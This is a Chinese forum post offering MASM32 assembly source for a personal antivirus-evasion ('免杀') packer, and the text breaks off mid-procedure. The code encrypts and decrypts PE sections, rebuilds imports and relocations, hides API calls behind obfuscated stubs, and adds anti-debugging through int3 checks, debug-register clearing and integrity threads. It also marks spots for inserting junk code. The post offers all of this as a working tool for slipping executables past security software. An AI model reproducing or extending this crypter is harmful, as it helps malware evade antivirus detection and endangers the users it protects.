想要一个自己个性的免杀工具吗??
【原创】:想要一个自己个性的免杀工具吗??【工具:Masm32】
特别声明:看不懂的不要回帖,论坛空间宝贵。
-----------------------------
.586
.model flat, stdcall
option casemap:none
;一下三行根据实际情况输入绝对路径
include windows.inc
include kernel32.inc
includelib kernel32.lib
set_seh proto :dword,:dword
.data
wsock32 db 'wsock32.dll',0
fname1 db 264 dup (?)
fname2 db 264 dup (?)
fname3 db 264 dup (?)
hfile1 dd ?
hfile2 dd ?
hfile3 dd ?
fsize1 dd ?
fsize2 dd ?
pt1 dd ?
pt2 dd ?
temp1 dd ?
mbi MEMORY_BASIC_INFORMATION <>
db 4 dup (?)
mbi2 MEMORY_BASIC_INFORMATION <>
comctl32 db 'comctl32.dll',0
ole32 db 'ole32.dll',0
oo db 'OleUninitialize',0
shell32 db 'shell32.dll',0
flag_add_section dd 1
flag_clear_boundimport dd 1
flag_clear_load_config dd 1
.code
entry: ;!!! 这个;!!!作为加花指令的标志,花指令生成程序遇到第奇数个;!!!即开始加花,偶数个停止加花
jmp _entry
flag_reentry db 0
check_int3 macro
pushf
push eax
mov eax,[ebp+4]
cmp byte ptr [eax],0cch
jne @f
push esi
push edx
xchg eax,esi
rdtsc
add edx,eax
and edx,000000ffh
mov [esi+edx],eax
pop edx
pop esi
@@:
pop eax
popf
endm
check_int3_0 macro
push ebp
mov ebp,esp
pushf
push eax
mov eax,[ebp+4]
cmp byte ptr [eax],0cch
jne @f
push esi
push edx
xchg eax,esi
rdtsc
add edx,eax
and edx,000000ffh
mov [esi+edx],eax
pop edx
pop esi
@@:
pop eax
popf
pop ebp
endm
check1_start label byte
_entry:
pushfd
pushad
call entry0 ;!!!
entry0: ;!!!
pop ebx
sub ebx,offset entry0
cmp flag_reentry[ebx],0
jne entry00
lea esi,entry00[ebx]
mov ecx,__ok - entry00
@@:
not byte ptr [esi]
inc esi
loop @b
mov flag_reentry[ebx],1
entry00:
jmp entry1
get_knl_base proc ;得到 kernel32.dll 基址
assume fs:nothing
mov eax,fs:[0]
check_int3_0
push edx
@@:
cmp dword ptr [eax],-1
je @f
mov eax,[eax]
jmp @b
@@:
mov eax,[eax+4]
and eax,0ffff0000h
@@1:
cmp word ptr [eax],'ZM'
je @f
sub eax,10000h
jmp @@1
@@:
mov edx,[eax+3ch]
add edx,eax
cmp dword ptr [edx],00004550h
je @f
sub eax,10000h
jmp @@1
@@:
pop edx
ret
get_knl_base endp
;tt1 db '1',0
;tt2 db '2',0
;tt3 db '3',0
;tt4 db '4',0
;disp proc uses eax ecx edx
; pushf
; cmp check1[ebx],0
; je @f
; lea edx,tt1[ebx]
; jmp dp5
;@@:
; cmp check2[ebx],0
; je @f
; lea edx,tt2[ebx]
; jmp dp5
;@@:
;
; jmp dp9
;
; cmp hEvent[ebx],0
; je @f
; lea edx,tt3[ebx]
; jmp dp5
;@@:
; cmp hEvent1[ebx],0
; jne @f
; lea edx,tt4[ebx]
; jmp dp5
;@@:
; jmp dp9
;dp5:
; push MB_OK
; push edx
; push edx
; push 0
; call f_MessageBox[ebx]
;dp9:
; popf
; ret
;disp endp
;disp1 proc uses eax ecx edx
; pushf
; lea eax,ttt[ebx]
; push MB_OK
; push eax
; push eax
; push 0
; call f_MessageBox[ebx]
; popf
; ret
;disp1 endp
;
check_thread proc para
mov ebx,para
lea eax,seh1[ebx]
invoke set_seh,1,eax
ct0:
@@:
test flag_thread_end[ebx],1
jnz ct9
test flag_thread_active[ebx],1
jz @b
;;; jmp ct30 ;;;;;;;;;;;;;
lea esi,check1_start[ebx]
lea edi,check1_end[ebx]
mov eax,0
mov ecx,0
@@:
mov cl,[esi]
sub eax,ecx
inc esi
cmp esi,edi
jb @b
ct2 label byte
sub eax,check1_sum[ebx]
add check1[ebx],eax
add decode_key[ebx],eax
xor eax,'jdsg'
int 0f7h
add check1[ebx],eax
test flag_thread_finish[ebx],10b
jz ct3
lea esi,check2_start[ebx]
lea edi,check2_end[ebx]
mov eax,0
mov ecx,0
@@:
mov cl,[esi]
add eax,ecx
inc esi
cmp esi,edi
jb @b
ct21 label byte
sub eax,check2_sum[ebx]
xor check2[ebx],eax
xor decode_key[ebx],eax
sub eax,'jkdf'
int 0f7h
xor check2[ebx],eax
ct30:
or flag_thread_finish[ebx],1
ct3:
; call disp ;;;;;;;;;;;;;;;
jmp ct0
ct9:
and flag_thread_active[ebx],0fffffffeh
invoke set_seh,0,0
or flag_thread_exit[ebx],1
ret
check_thread endp
get_func_address proc stdcall uses ebx ecx edx esi edi base,p_funcname
local save_ebx:dword
mov save_ebx,ebx
gfa1:
mov ebx,base
mov eax,[ebx+3ch] ;'PE'
mov eax,[ebx+eax+78h] ;export table
test p_funcname,80000000h
je gfa5
mov esi,[ebx+eax+24h] ;addr of ord
mov edx,[ebx+eax+14h] ;number of func
mov ecx,p_funcname
and ecx,7fffffffh
sub ecx,[ebx+eax+10h]
cmp ecx,edx
jae @@90
add ecx,ecx
add ecx,ecx
mov edi,ecx
add edi,[ebx+eax+1ch]
mov eax,[ebx+edi]
add eax,ebx
jmp gfa6
gfa5:
cmp ebx,p_funcname
ja @f
;;; mov eax,p_funcname
;;; jmp @@9
@@:
mov esi,[ebx+eax+20h] ;addr of names
mov edx,[ebx+eax+18h] ;number of names
push eax
@@0:
mov ecx,p_funcname
mov edi,[esi+ebx]
@@:
mov al,[edi+ebx]
cmp al,[ecx]
jne @f
cmp al,0
je @@1
inc edi
inc ecx
jmp @b
@@:
add esi,4
dec edx
jnz @@0
mov eax,0
jmp @@9
@@1:
pop eax ;export table
sub esi,[ebx+eax+20h]
shr esi,1
add esi,[ebx+eax+24h] ;addr of 序号
movzx esi,word ptr [ebx+esi]
shl esi,2
add esi,[ebx+eax+1ch] ;addr of functions
mov eax,[ebx+esi]
add eax,ebx
gfa6:
mov ebx,save_ebx
check_int3
lea edx,forwardchain_dll[ebx]
lea edi,forwardchain_handle[ebx]
add eax,check2[ebx]
gfa70:
mov esi,[edx]
cmp esi,0
je @@9
add esi,ebx
push eax
push esi
dec esi
dec eax
gfa7:
inc eax
inc esi
mov cl,[eax]
cmp cl,'a'
jb @f
cmp cl,'z'
ja @f
and cl,0dfh
@@:
cmp cl,[esi]
jne @f
cmp cl,'.'
je gfa75
jmp gfa7
@@:
pop esi
pop eax
add edx,4
add edi,4
jmp gfa70
gfa75:
pop esi
cmp dword ptr [edi],0
jne @f
push eax
push esi
call f_LoadLibrary[ebx]
mov [edi],eax
pop eax
@@:
inc eax
add eax,check1[ebx]
mov p_funcname,eax
mov eax,[edi]
mov base,eax
pop eax
mov ebx,save_ebx
jmp gfa1
@@90:
mov eax,0
@@9:
ret
get_func_address endp
set_seh proc uses eax flag,ofs
assume fs:nothing
cmp flag,0
check_int3
je @f
mov eax,fs:[0]
mov flag,eax
lea eax,flag
mov fs:[0],eax
jmp ss9
@@:
mov eax,[ofs+4]
mov fs:[0],eax
ret 4*4
ss9:
ret 0
set_seh endp
thread_control proc para
mov ebx,para
;lea eax,ttt[ebx]
;push MB_OK
;push eax
;push eax
;push 0
;call f_MessageBox[ebx]
;int 3
tc00:
test flag_thread_end[ebx],80000000h
jnz tc9
tc0:
test flag_thread_create[ebx],1
je @f
and flag_thread_create[ebx],0fffffffeh
and flag_thread_end[ebx], 0fffffffeh
and flag_thread_exit[ebx], 0fffffffeh
lea edx,check_thread[ebx]
jmp tc1
@@:
test flag_thread_create[ebx],10b
je @f
and flag_thread_create[ebx],0fffffffdh
and flag_thread_end[ebx], 0fffffffdh
and flag_thread_exit[ebx], 0fffffffdh
lea edx,decode_thread[ebx]
jmp tc1
@@:
test flag_thread_create[ebx],100b
je @f
and flag_thread_create[ebx],0fffffffbh
and flag_thread_end[ebx], 0fffffffbh
and flag_thread_exit[ebx], 0fffffffbh
lea edx,checkAPI_thread[ebx]
jmp tc1
@@:
jmp tc8
tc1:
lea eax,threadID[ebx]
push eax
push 0
push ebx
push edx
push 0
push 0
call f_CreateThread[ebx]
tc8:
jmp tc00
tc9:
and flag_thread_end[ebx], 7fffffffh
or flag_thread_exit[ebx],80000000h
ret
thread_control endp
seh1 proc uses ebx ecx edx esi lpExceptionRecord,lpSEH,lpContext,lpDisp
mov ecx,lpExceptionRecord
assume ecx:ptr EXCEPTION_RECORD
mov edx,lpContext
assume edx:ptr CONTEXT
mov eax,[ecx].ExceptionAddress
mov ax,[eax]
cmp ax,0f5cdh
je _f5cd
cmp ax,0f6cdh
je _f6cd
cmp ax,0f7cdh
je _f7cd
mov eax,0 ;1
jmp se9 ;jmp se91
_f5cd:
mov eax,0
mov [edx].iDr0,eax
mov [edx].iDr1,eax
mov [edx].iDr2,eax
mov [edx].iDr3,eax
;;; mov [edx].iDr7,0 ;155h
jmp se9
_f6cd:
push ecx
push edx
mov eax,[edx].regEsp
mov esi,[eax]
add [edx].regEsp,4
mov ebx,[edx].regEbx
lea eax,threadID[ebx]
push eax
push 0
push ebx
push esi
push 0
push 0
call f_CreateThread[ebx]
; push eax
; call f_ResumeThread[ebx]
pop edx
pop ecx
jmp _f7cd
_f7cd:
mov eax,0
add eax,[edx].iDr0
add eax,[edx].iDr1
add eax,[edx].iDr2
add eax,[edx].iDr3
mov [edx].regEax,eax
mov eax,0
mov [edx].iDr0,eax
mov [edx].iDr1,eax
mov [edx].iDr2,eax
mov [edx].iDr3,eax
;;; mov [edx].iDr7,0 ;155h
jmp se9
se9:
add [edx].regEip,2
mov eax,0
se91:
assume ecx:nothing
assume edx:nothing
ret
seh1 endp
;!!!
check1_end label byte
pi PROCESS_INFORMATION <>
_si STARTUPINFO <>
proc_exit_code dd ?
shell_eip dd ?
check1 dd 0
hModule dd ?
hProc dd ?
buf db 256 dup (?)
knl_base dd ?
p_funcs label byte
f_GetProcAddress dd ?
f_VirtualAlloc dd ?
f_VirtualProtect dd ?
f_CreateProcess dd ?
f_CreateEvent dd ?
f_OpenEvent dd ?
f_GetModuleHandle dd ?
f_WaitForSingleObject dd ?
f_GetModuleFileName dd ?
f_GetCommandLine dd ?
f_LoadLibrary dd ?
f_FreeLibrary dd ?
f_CloseHandle dd ?
f_ExitProcess dd ?
f_GetExitCodeProcess dd ?
f_GetLastError dd ?
f_VirtualQuery dd ?
f_UnmapViewOfFile dd ?
f_VirtualFree dd ?
f_VirtualProtectEx dd ?
f_CreateThread dd ?
f_ResumeThread dd ?
f_DisableThreadLibraryCalls dd ?
p_funcnames db 'GetProcAddress',0
db 'VirtualAlloc',0
p_vp db 'VirtualProtect',0
db 'CreateProcessA',0
db 'CreateEventA',0
db 'OpenEventA',0
db 'GetModuleHandleA',0
db 'WaitForSingleObject',0
db 'GetModuleFileNameA',0
db 'GetCommandLineA',0
p_ll db 'LoadLibraryA',0
db 'FreeLibrary',0
db 'CloseHandle',0
db 'ExitProcess',0
db 'GetExitCodeProcess',0
db 'GetLastError',0
db 'VirtualQuery',0
db 'UnmapViewOfFile',0
db 'VirtualFree',0
db 'VirtualProtectEx',0
db 'CreateThread',0
db 'ResumeThread',0
db 'DisableThreadLibraryCalls',0
db 0
event_name db 'jdsglxg',0
hNTDLL dd 0
ntdllname db 'ntdll.dll',0
p_getlasterror db 'RtlGetLastWin32Error',0
hEvent dd 0
oringal_proc_offs dd ?
decode_key dd ?
oringal_proc_size dd ?
old_protect_flag dd ?
check2 dd 0
iat_offs dd ?
iat_size dd ?
reloc_offs dd ?
reloc_size dd ?
image_base dd ?
hEvent1 dd 0
check2_sum dd ?
threadID dd ?
flag_thread_end dd 0
p_mem1 dd ?
p_mem2 dd ?
flag_thread_exit dd 0
temp dd ?
flag_thread_create dd 0
mbi1 MEMORY_BASIC_INFORMATION <>
dll_exitcode dd 0
iat_pt dd 0
flag_finish dd 0
exitcode dd 312321
msg db 'Are you sure ?',0
rnd dd ?
titl db '^_^',0
flag_thread_finish dd 0
user32name db 'user32.dll',0
hUser32 dd ?
iat_size0 dd 0
flag_thread_active dd 0
p_msgbox db 'MessageBoxA',0
f_MessageBox dd ?
decode_start dd ?
check1_sum dd ?
decode_end dd ?
number_of_section dd ?
ttt db 'xxx',0
rva_table dd 10h dup (0,0)
flag_encode label dword
export dd 1
import dd 1
res dd 0
exception dd 0
security dd 0
base_reloc dd 1
debug dd 0
copyright dd 0
globlptr dd 0
tls dd 0
loadconfig dd 0
bound_import dd 0
import1 dd 0
delay_import dd 0
dd 0
dd 0
forwardchain_dll dd kernel32,user32,gdi32,ntdll,advapi32,ws2_32,mswsock,shlwapi
dd 0
forwardchain_handle dd 0 ,0 ,0 ,0 ,0 ,0 ,0 ,0
dd 0
kernel32 db 'KERNEL32.dll',0
user32 db 'USER32.dll',0
gdi32 db 'GDI32.dll',0
ntdll db 'NTDLL.dll',0
advapi32 db 'ADVAPI32.dll',0
ws2_32 db 'WS2_32.dll',0
mswsock db 'MSWSOCK.dll',0
shlwapi db 'SHLWAPI',0
file_type db 1 ;1 - exe 2 - dll
data_size = $ - offset pi
check2_start label byte
entry1: ;!!!
cld
call get_knl_base
push eax
lea ecx,p_ll[ebx]
invoke get_func_address,eax,ecx
mov f_LoadLibrary[ebx],eax
pop eax
mov knl_base[ebx],eax
lea edi,p_funcnames[ebx]
lea esi,p_funcs[ebx]
@@:
cmp byte ptr [edi],0
je @f
mov eax,knl_base[ebx]
invoke get_func_address,eax,edi
mov [esi],eax
add esi,4
mov ecx,-1
mov al,0
repne scasb
je @b
@@:
lea eax,user32name[ebx]
push eax
call f_LoadLibrary[ebx]
mov hUser32[ebx],eax
lea ecx,p_msgbox[ebx]
invoke get_func_address,eax,ecx
mov f_MessageBox[ebx],eax
;;;mov check1[ebx],0
;call disp1
cmp file_type[ebx],1 ;exe
je is_exe
cmp file_type[ebx],2 ;dll
jne error_exit
cmp dword ptr [esp+24h+4+4],1 ;dll_process_attach
jne dll_ret
mov eax,[esp+24h+4+0]
mov hModule[ebx],eax
push eax
call f_DisableThreadLibraryCalls[ebx]
; call 校验dll
; cmp eax,正确值
jmp dll_ok ;;;je dll_ok
dll_error:
popad
popfd
mov eax,0
ret 3*4
dll_ok:
mov eax,exitcode[ebx]
mov dll_exitcode[ebx],eax
jmp exe_dll ;;;cc
dll_ret:
mov eax,dll_exitcode[ebx]
cmp eax,exitcode[ebx]
jne dll_error
cmp flag_finish[ebx],0
jne pe0
jmp dll_error
is_exe:
push 0
call f_GetModuleHandle[ebx]
mov hModule[ebx],eax
exe_dll:
lea eax,event_name[ebx]
push eax
push 0
push EVENT_ALL_ACCESS
call f_OpenEvent[ebx]
cmp eax,0
je firstrun
push eax
push eax
call f_CloseHandle[ebx]
pop hEvent1[ebx]
;call disp1
lea eax,seh1[ebx]
invoke set_seh,1,eax
int 0f5h ;clear DRx
lea eax,thread_control[ebx]
push eax
int 0f6h ;create control thread ,return:eax=DRx
or flag_thread_create[ebx],111b
lea eax,_ok[ebx]
mov decode_start[ebx],eax
or flag_thread_active[ebx],1 ;active check
lea eax,__ok[ebx]
mov decode_end[ebx],eax
not eax
int 0f7h ;Get and clear DRx
and flag_thread_finish[ebx],0fffffffdh
add decode_key[ebx],eax
or flag_thread_active[ebx],10b ;active decode
@@:
test flag_thread_finish[ebx],10b
int 0f7h
jz @b
jmp _ok
lea eax,second_entry[ebx]
mov dword ptr proc_ret_addr[ebx+1],eax
popad
popfd
proc_ret_addr label byte ;!!!
push 12345678h ;!!!
ret
isnot? proc stdcall uses eax ecx edx pt
mov ecx,0
mov edx,pt
check_int3
is0:
mov eax,dword ptr rva_table[ecx*8][ebx]
cmp eax,0
je is1
sub eax,3
cmp edx,eax
jb is1
add eax,dword ptr rva_table[ecx*8+4][ebx]
add eax,3
cmp edx,eax
jae is1
cmp dword ptr flag_encode[ecx*4][ebx],0
jne is2
xor al,al
jmp is9
is1:
inc ecx
cmp ecx,16
jb is0
is2:
or al,1
is9:
ret
isnot? endp
;!!!
api1:
push eax
pushf
push eax
api1_1 label byte
mov eax,87264981h
api1_2 label byte
sub eax,71526384h
mov [esp+6],eax
pop eax
popf
ret
api1_len = $ - offset api1
api2:
push eax
pushf
push eax
api2_1 label byte
mov eax,41836496h
api2_2 label byte
xor eax,18932755h
mov [esp+6],eax
pop eax
popf
ret
api2_len = $ - offset api2
api3:
push eax
pushf
push eax
api3_1 label byte
mov eax,36384594h
api3_2 label byte
add eax,92837461h
mov [esp+6],eax
pop eax
popf
ret
api3_len = $ - offset api3
;!!!
checkAPI_thread proc para
mov ebx,para
lea eax,seh1[ebx]
invoke set_seh,1,eax
ca0:
test flag_thread_end[ebx],100b
jnz ca9
cld
ca1:
mov eax,ebx
not eax
int 0f7h
add check2[ebx],eax
xchg esi,eax
mov al,0cch
mov edi,f_VirtualProtect[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_VirtualProtectEx[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_CreateThread[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_VirtualAlloc[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_LoadLibrary[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_VirtualFree[ebx]
mov ecx,10
repne scasb
je ca5
or flag_thread_finish[ebx],100b
xor check1[ebx],esi
jmp ca6
ca5:
sub check1[ebx],eax
inc dword ptr dc_edit+1
inc dword ptr ec_edit+1
add check2[ebx],eax
inc decode_key[ebx]
; lea eax,ttt[ebx]
; push MB_OK
; push eax
; push eax
; push 0
; call f_MessageBox[ebx]
ca6:
jmp ca0
ca9:
invoke set_seh,0,0
or flag_thread_exit[ebx],100b
ret
checkAPI_thread endp
decode proc stdcall uses esi ecx edx edi p_offs,p_size,base,xz
; ret
dc0:
mov ecx,p_size
cmp ecx,4
jb dc9
sub ecx,3
mov esi,p_offs
add esi,xz
check_int3
mov edx,base
dc_edit label byte ;!!!
mov eax,'jdsg' ;!!!
dc1:
sub esi,xz
invoke isnot?,esi
pushf
add esi,xz
popf
jz @f
push eax
mov eax,-1
;int 0f7h
mov edi,eax
pop eax
xor [esi+edx],eax
; ror eax,7
add eax,7
;xor [esi+edx],edi
@@:
inc esi
loop dc1
dc9:
ret
decode endp
encode proc stdcall uses ebx esi ecx edx p_offs,p_size,base,xz
; ret
mov ebx,0
mov ecx,p_size
cmp ecx,4
jb ec9
sub ecx,3
mov esi,p_offs
add esi,xz
mov edx,base
ec_edit label byte ;!!!
mov eax,'jdsg' ;!!!
ec1:
sub esi,xz
invoke isnot?,esi
pushf
add esi,xz
popf
jz @f
xor [esi+edx],eax
; ror eax,7
add eax,7
@@:
inc esi
loop ec1
ec9:
ret
encode endp
move_memory proc
; jecxz mm9
or ecx,ecx
jz mm9
cmp esi,edi
je mm9
check_int3_0
pushf
cld
cmp esi,edi
jae @f
add esi,ecx
add edi,ecx
dec esi
dec edi
std
@@:
rep movsb
popf
mm9:
ret
move_memory endp
proc_iat proc uses ecx edx esi edi ebp
mov esi,eax
mov ecx,9
mov edx,0
pi00:
cmp byte ptr [esi],0
jne @f
inc edx
@@:
inc esi
loop pi00
cmp edx,4 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
check_int3_0
jb pi0
;call disp1
jmp pi9
pi0:
mov esi,eax
pi1:
inc rnd[ebx]
mov eax,rnd[ebx]
rol eax,5
mov edx,rnd[ebx]
ror edx,17
add eax,edx
mov rnd[ebx],eax
jz pi1
and eax,3
cmp eax,0
jne @f
lea ebp,api1[ebx]
lea ecx,api1_1+1[ebx]
lea edx,api1_2+1[ebx]
mov edi,rnd[ebx]
add esi,edi
push api1_len
jmp pi5
@@:
cmp eax,1
jne @F
lea ebp,api3[ebx]
lea ecx,api3_1+1[ebx]
lea edx,api3_2+1[ebx]
mov edi,rnd[ebx]
sub esi,edi
push api3_len
jmp pi5
@@:
lea ebp,api2[ebx]
lea ecx,api2_1+1[ebx]
lea edx,api2_2+1[ebx]
mov edi,rnd[ebx]
xor esi,edi
push api2_len
pi5:
cmp iat_size0[ebx],api1_len
jb pi6
cmp iat_size0[ebx],api2_len
jb pi6
cmp iat_size0[ebx],api3_len
jae pi8
pi6:
push ecx
push edx
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT or MEM_TOP_DOWN
push 4096
push 0
call f_VirtualAlloc[ebx]
mov iat_pt[ebx],eax
mov iat_size0[ebx],4096
pop edx
pop ecx
pi8:
pop eax
sub iat_size0[ebx],eax
push ecx
push edx
push esi
mov ecx,eax
mov eax,iat_pt[ebx]
add iat_pt[ebx],ecx
mov esi,0
pi81:
mov dl,ds:[ebp+esi]
mov [eax+esi],dl
inc esi
loop pi81
pop esi
pop edx
pop ecx
sub ecx,ebp
sub edx,ebp
mov dword ptr [eax+ecx],esi
mov dword ptr [eax+edx],edi
pi9:
ret
proc_iat endp
decode_thread proc para
mov ebx,para
lea eax,seh1[ebx]
invoke set_seh,1,eax
dt0:
@@:
test flag_thread_end[ebx],10b
jnz dt9
test flag_thread_active[ebx],10b
jz @b
;.......
mov esi,decode_start[ebx]
mov eax,esi
int 0f7h
mov edi,decode_end[ebx]
add edi,eax
mov eax,decode_key[ebx]
@@:
cmp esi,edi
jae @f
xor [esi],al
inc eax
ror eax,7
mov edx,eax
int 0f7h
add eax,edx
inc esi
jmp @b
@@:
and flag_thread_active[ebx],0fffffffdh
or flag_thread_finish[ebx],10b
jmp dt0
dt9:
and flag_thread_active[ebx],0fffffffdh
invoke set_seh,0,0
or flag_thread_exit[ebx],10b
ret
decode_thread endp
clear_string proc uses eax string
pushf
mov eax,string
cs1:
test eax,80000000h
jnz cs9
cmp byte ptr [eax],0
je cs9
mov byte ptr [eax],0
inc eax
jmp cs1
cs9:
check_int3
popf
ret
clear_string endp
firstrun:
lea eax,event_name[ebx]
push eax
push 0
push 0
push 0
call f_CreateEvent[ebx]
mov hEvent[ebx],eax
lea eax,pi[ebx] ;PROCESS_INFORMATION
push eax
lea eax,_si[ebx]
push eax
push 0
push 0
push 0
push 0
push 0
push 0
call f_GetCommandLine[ebx]
push eax
push 0
call f_CreateProcess[ebx]
cmp eax,0
je create_process_fail
push INFINITE
push dword ptr pi[0][ebx]
call f_WaitForSingleObject[ebx] ;等待进程结束
lea eax,proc_exit_code[ebx]
push eax
push dword ptr pi[0][ebx]
call f_GetExitCodeProcess[ebx]
push dword ptr pi[4][ebx]
call f_CloseHandle[ebx]
push dword ptr [pi+0][ebx]
call f_CloseHandle[ebx]
push dword ptr hEvent[ebx]
call f_CloseHandle[ebx]
jmp error_exit
mov eax,exitcode[ebx]
cmp proc_exit_code[ebx],eax ;;;312321
je _ok
jne error_exit
_ok:
cc:
call cc1 ;!!!
cc1: ;!!!
pop ebx
sub ebx,offset cc1
jmp @@1000
;;;call disp ;;;;;;;;;;;;;;;
@@1000:
;call disp1
mov edx,hModule[ebx]
mov esi,[edx+3ch]
lea esi,[esi+edx+0f8h]
mov edi,esi
@@:
imul esi,number_of_section[ebx],28h
add esi,edi
jmp @@10
cmp dword ptr [esi+0ch],0
je @@100
cmp dword ptr [esi+08h],0
je @@100
add esi,28h
jmp @b
@@100:
sub esi,28h
@@10:
sub esi,28h
cmp esi,edi
jb @@19
push edx
lea eax,old_protect_flag[ebx]
push eax
mov eax,hEvent[ebx]
push PAGE_READWRITE
add dword ptr [ebx][dc_edit+1],eax
mov eax,[esi+8]
test hEvent1[ebx],0ffffffffh
jz @@18
push eax
mov eax,[esi+0ch]
add eax,edx
push eax
call f_VirtualProtect[ebx]
pop edx
push old_protect_flag[ebx]
mov eax,dword ptr ttt[ebx]
int 0f7h
add dword ptr cc20[ebx],eax
jmp @@15
mov ecx,[edx+3ch]
lea ecx,[ecx+edx+0a8h]
mov eax,[ecx]
cmp eax,0
je @f
add eax,[ecx+4]
cmp eax,[esi+0ch]
jb @f
mov eax,[esi+0ch]
add eax,[esi+8]
cmp eax,[ecx]
ja @@18
@@:
mov ecx,[edx+3ch]
lea ecx,[ecx+edx+88h]
mov eax,[ecx]
cmp eax,0
je @f
add eax,[ecx+4]
cmp eax,[esi+0ch]
jb @f
mov eax,[esi+0ch]
add eax,[esi+8]
cmp eax,[ecx]
ja @@18
@@:
mov ecx,[edx+3ch]
lea ecx,[ecx+edx+0c0h]
mov eax,[ecx]
cmp eax,0
je @f
add eax,[ecx+4]
cmp eax,[esi+0ch]
jb @f
mov eax,[esi+0ch]
add eax,[esi+8]
cmp eax,[ecx]
ja @@18
@@:
@@15:
sub dword ptr cc2[ebx],eax
mov eax,[esi+8]
sub edx,check2[ebx]
cmp eax,[esi+10h]
jbe @f
mov eax,[esi+10h]
@@:
mov ecx,[esi+0ch]
;;;;;add ecx,edx
invoke decode,ecx,eax,edx,0
@@18:
jmp @@10
@@19:
;;;call disp1
;call disp1
;处理import表
iat:
mov edx,hModule[ebx]
mov esi,[edx+3ch]
mov esi,iat_offs[ebx] ;;;[esi+edx+80h] ;import table
cmp esi,0
je cc3
cc2:
mov eax,[esi+edx+0ch] ;dll name
cmp eax,0
je cc3
add eax,edx
push edx
push eax
push eax
call f_LoadLibrary[ebx]
call clear_string
pop edx
mov ecx,eax
mov edi,[esi+edx+10h] ;func name
add edi,edx
push esi
mov eax,[esi+edx+0]
cmp eax,0
jne @f
mov eax,[esi+edx+10h]
@@:
mov esi,eax
test hEvent1[ebx],0ffffffffh
jz cc20
add esi,edx
cc20:
cmp dword ptr [esi],0
je cc21
mov eax,dword ptr [esi]
test eax,80000000h
jnz @f
cmp eax,ecx
jae @f
add eax,edx
add eax,2
@@:
push eax
push eax
push ecx
call get_func_address
call clear_string
cmp eax,0
je @f
call proc_iat
mov [edi],eax
@@:
mov eax,hEvent[ebx]
add [edi],eax
add edi,4
test threadID[ebx],0ffffffffh
jz cc21
add esi,4
jmp cc20
cc21:
pop esi
add esi,14h
jmp cc2
cc3:
mov eax,hEvent[ebx]
mov edi,iat_offs[ebx]
add edi,edx
mov ecx,iat_size[ebx]
xor shell_eip[ebx],eax
mov al,0
; rep stosb ;清import table 有些程序不能正常运行
; call clear_import_table
;处理reloc表
;
mov edx,hModule[ebx]
mov esi,[edx+3ch]
mov esi,reloc_offs[ebx] ;;;[esi+edx+0a0h] ;reloc table
cmp esi,0
je rl2
lea esi,[esi+edx]
rl1:
cmp dword ptr [esi],0
je rl2
push esi
mov edi,[esi]
mov ecx,[esi+4]
sub ecx,8
shr ecx,1
rt12:
movzx eax,word ptr [esi+8]
push eax
and ax,0011000000000000b
cmp ax,0011000000000000b
pop eax
jne @f
and ax,0000111111111111b
add eax,edi
add dword ptr[eax+edx],edx
push ecx
mov ecx, dword ptr image_base[ebx]
sub dword ptr [eax+edx],ecx
mov ecx,check2[ebx]
add ecx,check1[ebx]
sub dword ptr [eax+edx],ecx
pop ecx
@@:
add esi,2
loop rt12
pop esi
add esi,[esi+4]
jmp rl1
rl2:
mov edi,reloc_offs[ebx]
add edi,edx
mov ecx,reloc_size[ebx]
mov al,0
; rep stosb
mov eax,decode_key[ebx]
mov edx,hModule[ebx]
mov esi,[edx+3ch]
lea esi,[esi+edx+0f8h]
mov edi,esi
xor shell_eip[ebx],eax
@@:
imul esi,number_of_section[ebx],28h
add esi,edi
jmp [email=_@@100]_@@100[/email]
cmp dword ptr [esi+0ch],0
je [email=_@@100]_@@100[/email]
cmp dword ptr [esi+08h],0
je [email=_@@100]_@@100[/email]
add esi,28h
jmp @b
[email=_@@100]_@@100[/email]:
sub esi,28h
xchg edi,esi
[email=_@@10]_@@10[/email]:
cmp esi,edi
jnbe [email=_@@19]_@@19[/email]
pop ecx
push edx
lea eax,old_protect_flag[ebx]
push eax
cc15:
push ecx
push dword ptr [esi+8]
mov eax,[esi+0ch]
add eax,edx
push eax
call f_VirtualProtect[ebx]
pop edx
add esi,28h
jmp [email=_@@10]_@@10[/email]
[email=_@@19]_@@19[/email]:
mov eax,shell_eip[ebx]
add eax,edx
add eax,check2[ebx]
xor eax,check1[ebx]
;call disp
push eax
;call disp1
or flag_thread_end[ebx],111b
or flag_thread_end[ebx],80000000h
@@:
mov eax,flag_thread_exit[ebx]
and eax,10000000000000000000000000000111b
xor eax,10000000000000000000000000000111b
jnz @b
pop eax
mov dword ptr proc_entry[ebx+1],eax
invoke set_seh,0,0
;call disp
or flag_finish[ebx],1
pe0:
cmp file_type[ebx],2 ;dll
jne @f
jmp pe1
@@:
;call disp1
lea edi,entry[ebx]
mov ecx,offset pe1 - offset entry
cld
mov al,0
rep stosb ;!!!
pe1: ;!!!
popad
popfd
;int 3
proc_entry label byte ;!!!
push 12345678 ;!!!
ret
second_entry:
call _cc1 ;!!!
_cc1: ;!!!
pop ebx
sub ebx,offset _cc1
push MB_YESNO
lea eax, titl[ebx]
push eax
lea eax, msg[ebx]
push eax
push 0
call f_MessageBox[ebx]
cmp eax,IDYES
je @f
push 0
jmp se1
@@:
push exitcode[ebx] ;;;312321
se1:
call f_ExitProcess[ebx]
__ok:
check2_end label byte
db 4 dup (?)
create_process_fail:
error_exit:
push 0
call f_ExitProcess[ebx]
;!!!
;added on 2006-3-4
db 'rNiLaToV'
ipt db 14h * 2 dup (0)
size1 = $ - offset ipt
dllname db 'kernel32.dll',0
size2 = $ - offset dllname
funname db 0,0,'GetVersion',0
size3 = $ - offset funname
funaddr dd ?,0
size4 = $ - offset funaddr
;added on 2006-3-4
key_size = $ - offset entry
db 1000h dup (0)
trans proc uses eax esi edi
mov esi,eax
dec esi
@@:
inc esi
mov al,[esi]
cmp al,0
je t9
cmp al,20h
je @f
cmp al,9
jne @b
@@:
inc esi
mov al,[esi]
cmp al,0
je t9
cmp al,20h
je @b
cmp al,9
je @b
mov edi,offset fname1
@@:
mov al,[esi]
cmp al,20h
je @f
cmp al,9
je @f
mov [edi],al
inc esi
inc edi
cmp al,0
je t9
jmp @b
@@:
